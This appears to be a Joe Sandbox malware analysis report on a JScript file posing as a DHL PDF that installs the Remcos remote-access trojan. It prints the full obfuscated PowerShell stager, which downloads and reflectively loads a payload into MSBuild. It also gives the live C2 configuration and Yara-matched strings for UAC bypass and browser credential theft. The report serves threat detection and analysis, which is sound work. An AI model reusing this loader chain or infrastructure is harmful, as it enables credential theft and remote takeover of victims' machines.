Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHL RPA GRBP Template.PDF.js

Overview

General Information

Sample name:DHL RPA GRBP Template.PDF.js
Analysis ID:1619144
MD5:27cb47b5e1ac316a34e346dc787782f6
SHA1:70d3f484ab6ca95c0d03479894181a4fbb883583
SHA256:abc914c82dac8f803df0ae50a350c38cd7af60344f60936a6df01198efbb03f6
Tags:DHLjsRemcosRATuser-MAM
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and load assembly
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Injects a PE file into a foreign processes
Installs a global keyboard hook
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Silenttrinity Stager Msbuild Activity
Sigma detected: Suspicious Parent Double Extension File Execution
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses an obfuscated file name to hide its real file extension (double extension)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 1492 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL RPA GRBP Template.PDF.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6968 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$UUcRpCLGmLLdZKLGLZCh = '#x#.mon/ssc/sr.marolka#s//:sp##h';$khuGfWKcLCfBKPjrGWTo = $UUcRpCLGmLLdZKLGLZCh -replace '#', 't';$BokSBmcmWWtzWevWaoqx = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$qkoqGLWpWlePGLTbGWKi = New-Object System.Net.WebClient;$UtrGGLzeWZaiUKLALckK = $qkoqGLWpWlePGLTbGWKi.DownloadData($BokSBmcmWWtzWevWaoqx);$KznfbhLAKWeixbiKOLmf = [System.Text.Encoding]::UTF8.GetString($UtrGGLzeWZaiUKLALckK);$pqGmGJhCUdHPTWoNGzoi = '<<BASE64_START>>';$fkbtKicqWUKucKZfPsGZ = '<<BASE64_END>>';$IWkjipLrkKzmLLZTWnAZ = $KznfbhLAKWeixbiKOLmf.IndexOf($pqGmGJhCUdHPTWoNGzoi);$kLqhkkloLQnlpAAWtUfc = $KznfbhLAKWeixbiKOLmf.IndexOf($fkbtKicqWUKucKZfPsGZ);$IWkjipLrkKzmLLZTWnAZ -ge 0 -and $kLqhkkloLQnlpAAWtUfc -gt $IWkjipLrkKzmLLZTWnAZ;$IWkjipLrkKzmLLZTWnAZ += $pqGmGJhCUdHPTWoNGzoi.Length;$WZWCixKGqLjWLKAblnWb = $kLqhkkloLQnlpAAWtUfc - $IWkjipLrkKzmLLZTWnAZ;$BqfbkPmiGKPWmKNxlCCR = $KznfbhLAKWeixbiKOLmf.Substring($IWkjipLrkKzmLLZTWnAZ, $WZWCixKGqLjWLKAblnWb);$izpdcONcauWPfczuWZNS = [System.Convert]::FromBase64String($BqfbkPmiGKPWmKNxlCCR);$GtULNOKhlcioutbuALkp = [System.Reflection.Assembly]::Load($izpdcONcauWPfczuWZNS);$aPozWGuWPfkczdpKSqdK = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($khuGfWKcLCfBKPjrGWTo,'','','','MSBuild','','','','','C:\ProgramData\','marly','js','1','1','pessaries'))" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 1772 cmdline: "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\marly.js" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • MSBuild.exe (PID: 5600 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • wscript.exe (PID: 5656 cmdline: wscript.exe C:\ProgramData\marly.js MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["meme.linkpc.net:3174:1"], "Assigned name": "nm", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "sos", "Hide file": "Disable", "Mutex": "gig-G7MMFK", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "vlc", "Keylog folder": "ios", "Keylog file max size": "100"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.3527390495.0000000001208000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000008.00000002.3525134792.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000008.00000002.3525134792.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
      • 0x691e0:$a1: Remcos restarted by watchdog!
      • 0x69738:$a3: %02i:%02i:%02i:%03i
      • 0x69abd:$a4: * Remcos v
      00000008.00000002.3525134792.0000000000400000.00000040.00000400.00020000.00000000.sdmpREMCOS_RAT_variantsunknownunknown
      • 0x641e4:$str_a1: C:\Windows\System32\cmd.exe
      • 0x64160:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
      • 0x64160:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
      • 0x63610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
      • 0x63e48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
      • 0x6320c:$str_b2: Executing file:
      • 0x64328:$str_b3: GetDirectListeningPort
      • 0x63c08:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
      • 0x63e30:$str_b7: \update.vbs
      • 0x63234:$str_b9: Downloaded file:
      • 0x63220:$str_b10: Downloading file:
      • 0x632c4:$str_b12: Failed to upload file:
      • 0x642f0:$str_b13: StartForward
      • 0x64310:$str_b14: StopForward
      • 0x63dd8:$str_b15: fso.DeleteFile "
      • 0x63d6c:$str_b16: On Error Resume Next
      • 0x63e08:$str_b17: fso.DeleteFolder "
      • 0x632b4:$str_b18: Uploaded file:
      • 0x63274:$str_b19: Unable to delete:
      • 0x63da0:$str_b20: while fso.FileExists("
      • 0x63749:$str_c0: [Firefox StoredLogins not found]
      00000008.00000002.3525134792.0000000000400000.00000040.00000400.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewerdetects Windows exceutables potentially bypassing UAC using eventvwr.exeditekSHen
      • 0x63100:$s1: \Classes\mscfile\shell\open\command
      • 0x63160:$s1: \Classes\mscfile\shell\open\command
      • 0x63148:$s2: eventvwr.exe
      Click to see the 9 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.powershell.exe.16f1056dd48.5.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
        2.2.powershell.exe.16f1056dd48.5.unpackWindows_Trojan_Remcos_b296e965unknownunknown
        • 0x661e0:$a1: Remcos restarted by watchdog!
        • 0x66738:$a3: %02i:%02i:%02i:%03i
        • 0x66abd:$a4: * Remcos v
        2.2.powershell.exe.16f1056dd48.5.unpackREMCOS_RAT_variantsunknownunknown
        • 0x611e4:$str_a1: C:\Windows\System32\cmd.exe
        • 0x61160:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x61160:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x60610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
        • 0x60e48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
        • 0x6020c:$str_b2: Executing file:
        • 0x61328:$str_b3: GetDirectListeningPort
        • 0x60c08:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
        • 0x60e30:$str_b7: \update.vbs
        • 0x60234:$str_b9: Downloaded file:
        • 0x60220:$str_b10: Downloading file:
        • 0x602c4:$str_b12: Failed to upload file:
        • 0x612f0:$str_b13: StartForward
        • 0x61310:$str_b14: StopForward
        • 0x60dd8:$str_b15: fso.DeleteFile "
        • 0x60d6c:$str_b16: On Error Resume Next
        • 0x60e08:$str_b17: fso.DeleteFolder "
        • 0x602b4:$str_b18: Uploaded file:
        • 0x60274:$str_b19: Unable to delete:
        • 0x60da0:$str_b20: while fso.FileExists("
        • 0x60749:$str_c0: [Firefox StoredLogins not found]
        2.2.powershell.exe.16f1056dd48.5.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewerdetects Windows exceutables potentially bypassing UAC using eventvwr.exeditekSHen
        • 0x60100:$s1: \Classes\mscfile\shell\open\command
        • 0x60160:$s1: \Classes\mscfile\shell\open\command
        • 0x60148:$s2: eventvwr.exe
        8.2.MSBuild.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
          Click to see the 14 entries

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Base64 Encoded PowerShell Command Detected
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$UUcRpCLGmLLdZKLGLZCh = '#x#.mon/ssc/sr.marolka#s//:sp##h';$khuGfWKcLCfBKPjrGWTo = $UUcRpCLGmLLdZKLGLZCh -replace '#', 't';$BokSBmcmWWtzWevWaoqx = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$qkoqGLWpWlePGLTbGWKi = New-Object System.Net.WebClient;$UtrGGLzeWZaiUKLALckK = $qkoqGLWpWlePGLTbGWKi.DownloadData($BokSBmcmWWtzWevWaoqx);$KznfbhLAKWeixbiKOLmf = [System.Text.Encoding]::UTF8.GetString($UtrGGLzeWZaiUKLALckK);$pqGmGJhCUdHPTWoNGzoi = '<<BASE64_START>>';$fkbtKicqWUKucKZfPsGZ = '<<BASE64_END>>';$IWkjipLrkKzmLLZTWnAZ = $KznfbhLAKWeixbiKOLmf.IndexOf($pqGmGJhCUdHPTWoNGzoi);$kLqhkkloLQnlpAAWtUfc = $KznfbhLAKWeixbiKOLmf.IndexOf($fkbtKicqWUKucKZfPsGZ);$IWkjipLrkKzmLLZTWnAZ -ge 0 -and $kLqhkkloLQnlpAAWtUfc -gt $IWkjipLrkKzmLLZTWnAZ;$IWkjipLrkKzmLLZTWnAZ += $pqGmGJhCUdHPTWoNGzoi.Length;$WZWCixKGqLjWLKAblnWb = $kLqhkkloLQnlpAAWtUfc - $IWkjipLrkKzmLLZTWnAZ;$BqfbkPmiGKPWmKNxlCCR = $KznfbhLAKWeixbiKOLmf.Substring($IWkjipLrkKzmLLZTWnAZ, $WZWCixKGqLjWLKAblnWb);$izpdcONcauWPfczuWZNS = [System.Convert]::FromBase64String($BqfbkPmiGKPWmKNxlCCR);$GtULNOKhlcioutbuALkp = [System.Reflection.Assembly]::Load($izpdcONcauWPfczuWZNS);$aPozWGuWPfkczdpKSqdK = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($khuGfWKcLCfBKPjrGWTo,'','','','MSBuild','','','','','C:\ProgramData\','marly','js','1','1','pessaries'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$UUcRpCLGmLLdZKLGLZCh = '#x#.mon/ssc/sr.marolka#s//:sp##h';$khuGfWKcLCfBKPjrGWTo = $UUcRpCLGmLLdZKLGLZCh -replace '#', 't';$BokSBmcmWWtzWevWaoqx = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$qkoqGLWpWlePGLTbGWKi = New-Object System.Net.WebClient;$UtrGGLzeWZaiUKLALckK = $qkoqGLWpWlePGLTbGWKi.DownloadData($BokSBmcmWWtzWevWaoqx);$KznfbhLAKWeixbiKOLmf = [System.Text.Encoding]::UTF8.GetString($UtrGGLzeWZaiUKLALckK);$pqGmGJhCUdHPTWoNGzoi = '<<BASE64_START>>';$fkbtKicqWUKucKZfPsGZ = '<<BASE64_END>>';$IWkjipLrkKzmLLZTWnAZ = $KznfbhLAKWeixbiKOLmf.IndexOf($pqGmGJhCUdHPTWoNGzoi);$kLqhkkloLQnlpAAWtUfc = $KznfbhLAKWeixbiKOLmf.IndexOf($fkbtKicqWUKucKZfPsGZ);$IWkjipLrkKzmLLZTWnAZ -ge 0 -and $kLqhkkloLQnlpAAWtUfc -gt $IWkjipLrkKzmLLZTWnAZ;$IWkjipLrkKzmLLZTWnAZ += $pqGmGJhCUdHPTWoNGzoi.Length;$WZWCixKGqLjWLKAblnWb = $kLqhkkloLQnlpAAWtUfc - $IWkjipLrkKzmLLZTWnAZ;$BqfbkPmiGKPWmKNxlCCR = $KznfbhLAKWeixbiKOLmf.Substring($IWkjipLrkKzmLLZTWnAZ, $WZWCixKGqLjWLKAblnWb);$izpdcONcauWPfczuWZNS = [System.Convert]::FromBase64String($BqfbkPmiGKPWmKNxlCCR);$GtULNOKhlcioutbuALkp = [System.Reflection.Assembly]::Load($izpdcONcauWPfczuWZNS);$aPozWGuWPfkczdpKSqdK = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($khuGfWKcLCfBKPjrGWTo,'','','','MSBuild','','','','','C:\ProgramData\','marly','js','1','1','pessa
          Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$UUcRpCLGmLLdZKLGLZCh = '#x#.mon/ssc/sr.marolka#s//:sp##h';$khuGfWKcLCfBKPjrGWTo = $UUcRpCLGmLLdZKLGLZCh -replace '#', 't';$BokSBmcmWWtzWevWaoqx = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$qkoqGLWpWlePGLTbGWKi = New-Object System.Net.WebClient;$UtrGGLzeWZaiUKLALckK = $qkoqGLWpWlePGLTbGWKi.DownloadData($BokSBmcmWWtzWevWaoqx);$KznfbhLAKWeixbiKOLmf = [System.Text.Encoding]::UTF8.GetString($UtrGGLzeWZaiUKLALckK);$pqGmGJhCUdHPTWoNGzoi = '<<BASE64_START>>';$fkbtKicqWUKucKZfPsGZ = '<<BASE64_END>>';$IWkjipLrkKzmLLZTWnAZ = $KznfbhLAKWeixbiKOLmf.IndexOf($pqGmGJhCUdHPTWoNGzoi);$kLqhkkloLQnlpAAWtUfc = $KznfbhLAKWeixbiKOLmf.IndexOf($fkbtKicqWUKucKZfPsGZ);$IWkjipLrkKzmLLZTWnAZ -ge 0 -and $kLqhkkloLQnlpAAWtUfc -gt $IWkjipLrkKzmLLZTWnAZ;$IWkjipLrkKzmLLZTWnAZ += $pqGmGJhCUdHPTWoNGzoi.Length;$WZWCixKGqLjWLKAblnWb = $kLqhkkloLQnlpAAWtUfc - $IWkjipLrkKzmLLZTWnAZ;$BqfbkPmiGKPWmKNxlCCR = $KznfbhLAKWeixbiKOLmf.Substring($IWkjipLrkKzmLLZTWnAZ, $WZWCixKGqLjWLKAblnWb);$izpdcONcauWPfczuWZNS = [System.Convert]::FromBase64String($BqfbkPmiGKPWmKNxlCCR);$GtULNOKhlcioutbuALkp = [System.Reflection.Assembly]::Load($izpdcONcauWPfczuWZNS);$aPozWGuWPfkczdpKSqdK = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($khuGfWKcLCfBKPjrGWTo,'','','','MSBuild','','','','','C:\ProgramData\','marly','js','1','1','pessaries'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$UUcRpCLGmLLdZKLGLZCh = '#x#.mon/ssc/sr.marolka#s//:sp##h';$khuGfWKcLCfBKPjrGWTo = $UUcRpCLGmLLdZKLGLZCh -replace '#', 't';$BokSBmcmWWtzWevWaoqx = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$qkoqGLWpWlePGLTbGWKi = New-Object System.Net.WebClient;$UtrGGLzeWZaiUKLALckK = $qkoqGLWpWlePGLTbGWKi.DownloadData($BokSBmcmWWtzWevWaoqx);$KznfbhLAKWeixbiKOLmf = [System.Text.Encoding]::UTF8.GetString($UtrGGLzeWZaiUKLALckK);$pqGmGJhCUdHPTWoNGzoi = '<<BASE64_START>>';$fkbtKicqWUKucKZfPsGZ = '<<BASE64_END>>';$IWkjipLrkKzmLLZTWnAZ = $KznfbhLAKWeixbiKOLmf.IndexOf($pqGmGJhCUdHPTWoNGzoi);$kLqhkkloLQnlpAAWtUfc = $KznfbhLAKWeixbiKOLmf.IndexOf($fkbtKicqWUKucKZfPsGZ);$IWkjipLrkKzmLLZTWnAZ -ge 0 -and $kLqhkkloLQnlpAAWtUfc -gt $IWkjipLrkKzmLLZTWnAZ;$IWkjipLrkKzmLLZTWnAZ += $pqGmGJhCUdHPTWoNGzoi.Length;$WZWCixKGqLjWLKAblnWb = $kLqhkkloLQnlpAAWtUfc - $IWkjipLrkKzmLLZTWnAZ;$BqfbkPmiGKPWmKNxlCCR = $KznfbhLAKWeixbiKOLmf.Substring($IWkjipLrkKzmLLZTWnAZ, $WZWCixKGqLjWLKAblnWb);$izpdcONcauWPfczuWZNS = [System.Convert]::FromBase64String($BqfbkPmiGKPWmKNxlCCR);$GtULNOKhlcioutbuALkp = [System.Reflection.Assembly]::Load($izpdcONcauWPfczuWZNS);$aPozWGuWPfkczdpKSqdK = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($khuGfWKcLCfBKPjrGWTo,'','','','MSBuild','','','','','C:\ProgramData\','marly','js','1','1','pessa
          Sigma detected: Script Initiated Connection to Non-Local Network
          Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 23.186.113.60, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 1492, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49762
          Sigma detected: Silenttrinity Stager Msbuild Activity
          Source: Network ConnectionAuthor: Kiran kumar s, oscd.community: Data: DestinationIp: 178.237.33.50, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 5600, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49861
          Sigma detected: Suspicious Parent Double Extension File Execution
          Source: Process startedAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$UUcRpCLGmLLdZKLGLZCh = '#x#.mon/ssc/sr.marolka#s//:sp##h';$khuGfWKcLCfBKPjrGWTo = $UUcRpCLGmLLdZKLGLZCh -replace '#', 't';$BokSBmcmWWtzWevWaoqx = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$qkoqGLWpWlePGLTbGWKi = New-Object System.Net.WebClient;$UtrGGLzeWZaiUKLALckK = $qkoqGLWpWlePGLTbGWKi.DownloadData($BokSBmcmWWtzWevWaoqx);$KznfbhLAKWeixbiKOLmf = [System.Text.Encoding]::UTF8.GetString($UtrGGLzeWZaiUKLALckK);$pqGmGJhCUdHPTWoNGzoi = '<<BASE64_START>>';$fkbtKicqWUKucKZfPsGZ = '<<BASE64_END>>';$IWkjipLrkKzmLLZTWnAZ = $KznfbhLAKWeixbiKOLmf.IndexOf($pqGmGJhCUdHPTWoNGzoi);$kLqhkkloLQnlpAAWtUfc = $KznfbhLAKWeixbiKOLmf.IndexOf($fkbtKicqWUKucKZfPsGZ);$IWkjipLrkKzmLLZTWnAZ -ge 0 -and $kLqhkkloLQnlpAAWtUfc -gt $IWkjipLrkKzmLLZTWnAZ;$IWkjipLrkKzmLLZTWnAZ += $pqGmGJhCUdHPTWoNGzoi.Length;$WZWCixKGqLjWLKAblnWb = $kLqhkkloLQnlpAAWtUfc - $IWkjipLrkKzmLLZTWnAZ;$BqfbkPmiGKPWmKNxlCCR = $KznfbhLAKWeixbiKOLmf.Substring($IWkjipLrkKzmLLZTWnAZ, $WZWCixKGqLjWLKAblnWb);$izpdcONcauWPfczuWZNS = [System.Convert]::FromBase64String($BqfbkPmiGKPWmKNxlCCR);$GtULNOKhlcioutbuALkp = [System.Reflection.Assembly]::Load($izpdcONcauWPfczuWZNS);$aPozWGuWPfkczdpKSqdK = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($khuGfWKcLCfBKPjrGWTo,'','','','MSBuild','','','','','C:\ProgramData\','marly','js','1','1','pessaries'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$UUcRpCLGmLLdZKLGLZCh = '#x#.mon/ssc/sr.marolka#s//:sp##h';$khuGfWKcLCfBKPjrGWTo = $UUcRpCLGmLLdZKLGLZCh -replace '#', 't';$BokSBmcmWWtzWevWaoqx = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$qkoqGLWpWlePGLTbGWKi = New-Object System.Net.WebClient;$UtrGGLzeWZaiUKLALckK = $qkoqGLWpWlePGLTbGWKi.DownloadData($BokSBmcmWWtzWevWaoqx);$KznfbhLAKWeixbiKOLmf = [System.Text.Encoding]::UTF8.GetString($UtrGGLzeWZaiUKLALckK);$pqGmGJhCUdHPTWoNGzoi = '<<BASE64_START>>';$fkbtKicqWUKucKZfPsGZ = '<<BASE64_END>>';$IWkjipLrkKzmLLZTWnAZ = $KznfbhLAKWeixbiKOLmf.IndexOf($pqGmGJhCUdHPTWoNGzoi);$kLqhkkloLQnlpAAWtUfc = $KznfbhLAKWeixbiKOLmf.IndexOf($fkbtKicqWUKucKZfPsGZ);$IWkjipLrkKzmLLZTWnAZ -ge 0 -and $kLqhkkloLQnlpAAWtUfc -gt $IWkjipLrkKzmLLZTWnAZ;$IWkjipLrkKzmLLZTWnAZ += $pqGmGJhCUdHPTWoNGzoi.Length;$WZWCixKGqLjWLKAblnWb = $kLqhkkloLQnlpAAWtUfc - $IWkjipLrkKzmLLZTWnAZ;$BqfbkPmiGKPWmKNxlCCR = $KznfbhLAKWeixbiKOLmf.Substring($IWkjipLrkKzmLLZTWnAZ, $WZWCixKGqLjWLKAblnWb);$izpdcONcauWPfczuWZNS = [System.Convert]::FromBase64String($BqfbkPmiGKPWmKNxlCCR);$GtULNOKhlcioutbuALkp = [System.Reflection.Assembly]::Load($izpdcONcauWPfczuWZNS);$aPozWGuWPfkczdpKSqdK = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($khuGfWKcLCfBKPjrGWTo,'','','','MSBuild','','','','','C:\ProgramData\','marly','js','1','1','pessa
          Sigma detected: WScript or CScript Dropper
          Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL RPA GRBP Template.PDF.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL RPA GRBP Template.PDF.js", CommandLine|base64offset|contains: D, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL RPA GRBP Template.PDF.js", ProcessId: 1492, ProcessName: wscript.exe
          Sigma detected: Script Initiated Connection
          Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 23.186.113.60, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 1492, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49762
          Sigma detected: Suspicious Copy From or To System Directory
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\marly.js", CommandLine: "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\marly.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$UUcRpCLGmLLdZKLGLZCh = '#x#.mon/ssc/sr.marolka#s//:sp##h';$khuGfWKcLCfBKPjrGWTo = $UUcRpCLGmLLdZKLGLZCh -replace '#', 't';$BokSBmcmWWtzWevWaoqx = 